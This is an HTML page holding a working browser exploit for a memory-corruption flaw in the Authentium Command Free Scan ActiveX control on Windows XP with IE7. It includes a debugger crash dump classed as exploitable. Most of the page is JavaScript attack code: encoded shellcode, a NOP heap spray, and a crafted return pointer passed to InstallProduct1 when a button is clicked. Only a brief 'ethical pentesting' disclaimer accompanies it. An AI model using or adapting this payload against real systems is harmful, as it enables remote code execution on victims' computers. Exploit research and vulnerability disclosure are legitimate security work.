<html> <body> <pre> <img src="http://sotiriu.de/images/logo_wh_80.png"><br> <h2>Authentium Command Free Scan ActiveX Control Memory corruption Exploit</h2> Author: Nikolas Sotiriu (lofi) Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt
Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
<input language=JavaScript onclick=shoot() type=button value="Rule#5 Shoot first"><br>
<h3>ActiveX Control Informations:</h3> Name: CSS Web Installer Class Prog ID: CSSWEBLib.Installer Vendor: Authentium, Inc. Type: ActiveX-Control Version: 1.4.9508.605 GUID: {6CCE3920-3183-4B3D-808A-B12EB769DE12} File: cssweb.dll Folder: C:\WINDOWS\Downloaded Program Files\ Safe for Script: True Safe for Init: True IObjectSafety: False
<h3>Test Informations:</h3> - Windows XP SP3 IE7 Ger
<h3>M$ Exploitablitiy Informations</h3>
(158.968): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242 eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll - cssweb!DllUnregisterServer+0x37a3: 1000c1a9 8917 mov dword ptr [edi],edx ds:0023:42424242=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:005> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x42424242 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0x223e0447.0x22676030
Stack Trace: cssweb!DllUnregisterServer+0x37a3 cssweb!DllUnregisterServer+0x22d8 mshtml!CFontCache::GetBaseCcs+0x1bd mshtml!CStr::Set+0x1b mshtml!COneRun::Clone+0x87 Instruction Address: 0x000000001000c1a9
Description: User Mode Write AV Short Description: WriteAV Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030)
User mode write access violations that are not near NULL are exploitable.
</pre> <object classid='clsid:6CCE3920-3183-4B3D-808A-B12EB769DE12' id='obj'></object>
<script language='javascript'>
shellcode = unescape( '%ub0ba%u8813%udbda%ud9d5%u2474%u5ef4%uc933%u33b1'+ '%u5631%u8312%ufcee%ue603%u6a1d%ufa2f%ue3ca%u02d0'+ '%u940b%ue759%u863a%u6c3e%u166e%u2034%udd83%ud018'+ '%u9310%ud7b4%u1e91%ud6e3%uaf22%ub42b%ub1e1%uc6d7'+ '%u1235%u09e9%u5348%u772e%u01a3%ufce7%ub616%u408c'+ '%ub7ab%ucf42%ucf93%u0fe7%u7a67%u5fe9%uf1d8%u47a1'+ '%u5d52%u7612%ubdb7%u316e%u76bc%uc004%u4714%uf3e5'+ '%u0458%u3cd8%u5455%ufa1c%u2386%uf956%u343b%u80ad'+ '%ub1e7%u2230%u6163%ud391%uf4a0%udf52%u720d%uc33c'+ '%u5790%uff36%u5619%u7699%u7d59%ud33d%u1c39%ub964'+ '%u21ec%u6576%u8450%u87fc%ube85%ucd5e%u3258%ua8e5'+ '%u4c5b%u9ae6%u7d33%u756d%u8243%u32a4%u73b5%uae75'+ '%u2a22%u93ec%ucd2e%ud7da%u4e56%ua7ef%u4eac%ua29a'+ '%uc8e9%ude76%ubd62%u4d78%u9482%u101a%u7410%ub7f3'+ '%u1f90%u410b');
nops=unescape('%u9090%u9090'); headersize =20; slackspace= headersize + shellcode.length; //Filling the header while(nops.length< slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<0x30000) block= block+ block+ fillblock; //Creating the array. memory=new Array(); //Filling the array with the nops + shellcode. for( counter=0; counter<300; counter++) memory[counter]= block + shellcode;
//This is our RET edx=unescape('%08%08%08%08');
ret=''; //Junk for( counter=0; counter<=2075; counter++) ret+=unescape('%42');
//Build the pointer to our overwritten RET //I know this looks strange but it was the only way i found to overcome //the badchar problem (0x8E=>bad 0x94=>bad) ret+=unescape('%18'); ret+="?; //%8E must be given in as unicode sign (beware of you editor) ret+="?; //%95 must be given in as unicode sign (beware of you editor) ret+=unescape('%01'); //Pointer is => 0x01948e18 from cssweb.dll
function shoot() { obj.InstallProduct1(edx,ret)
}
</script> </body> </html>
|